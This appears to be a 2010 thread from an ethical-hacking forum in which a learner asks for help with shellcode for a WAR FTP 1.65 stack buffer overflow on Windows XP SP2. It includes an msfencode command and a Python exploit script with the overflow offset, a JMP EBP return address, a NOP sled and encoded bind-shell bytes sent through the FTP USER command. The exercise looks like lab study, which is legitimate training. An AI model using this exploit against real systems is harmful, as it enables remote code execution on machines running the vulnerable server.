The Ethical Hacker Network - Frustrated with Shellcode

Latest Additions

Who's Online

N3WB134444

Newbie

Offline

Posts: 5

Frustrated with Shellcode

« on: June 21, 2010, 08:22:12 AM »

I started coding the WAR FTP 1.65 Remote Code exploit in python to exploit a Win XP SP2 machine this morning and it's still not finished:(. it went fine up until the point that shellcode had to be added.

i managed to overwrite EIP with my A's and eventually with a JMP EBP from my USR32.dl file and even managed to put in my breakpoints where my shellcode was supposed to go, everything worked with Ollydbg. but I kept failing at the shellcode which I generated with Msfpayload. I spent the rest of the day playing around with different shellcodes trying to get the blasted thing to work, I played with different connecting shellcodes, vnc injects encoders and even filtering out bad characters, padding with Nops and the blasted thing still wouldn't work.

Could anybody please provide me with any tips for shellcode. I understand the difference between types of shells e.g bind and reverse but the different encoders are throwing me off. could I have just missed a bad character somewhere. Any help would be much appreciated thanks


	Logged

n1p

Jr. Member

Offline

Posts: 89

Re: Frustrated with Shellcode

« Reply #1 on: June 23, 2010, 03:37:07 PM »

Better late than neveer Wink

I normally use the alpha upper encoder which should remove bad characters. I remember having problems with the gai-nai encoder and removing bad characters whilst exploiting a program previously.

msfencode -e x86/alpha_upper -t c

Paste that into your exploit code and see. Also happy to look at your code if necessary.

http://seclists.org/metasploit/2006/q4/51 - possibly related

cheers


« Last Edit: June 23, 2010, 03:46:47 PM by n1p »	Logged

N3WB134444

Newbie

Offline

Posts: 5

Re: Frustrated with Shellcode

« Reply #2 on: June 24, 2010, 04:39:16 AM »

Thanks very much for your help and wreply I will give it a go and let you know how it turns out

Cheers


	Logged

n1p

Jr. Member

Offline

Posts: 89

Re: Frustrated with Shellcode

« Reply #3 on: June 24, 2010, 03:21:22 PM »

No problem, do let us know how it turns out Tongue


	Logged

N3WB134444

Newbie

Offline

Posts: 5

Re: Frustrated with Shellcode

« Reply #4 on: June 25, 2010, 05:04:50 AM »

well i tried Alpha_Upper encoding, reviewed my code and couldn't see anything that terminate the string. so here is my code.

EIP was overwritten at the 476th byte.

I used JMP EBP which i discovered in USER32.dll as it had more room for shellcode.

I used a ./msfpaylod windows/shell_bind_tcp payload with the /x86/alpha
encoder

Any insight that you could provide would be most appreciative thanks

#!/usr/bin/python
import socket
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell=("\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43""\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34""\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x41\x41")
ret = "\x32\xa4\xd5\x77"
#EBP ADDRESS 77D5A432
buffer = '\x41' *476 + ret + '\x90' *16 + '\x90' * 16 + shell
print "\nSending evil buffer..."
s.connect (('10.16.250.4',21))
data=s.recv(1024)
s.send('USER anonymous' + buffer +'\r\n')
data = s.recv(1024)
s.close()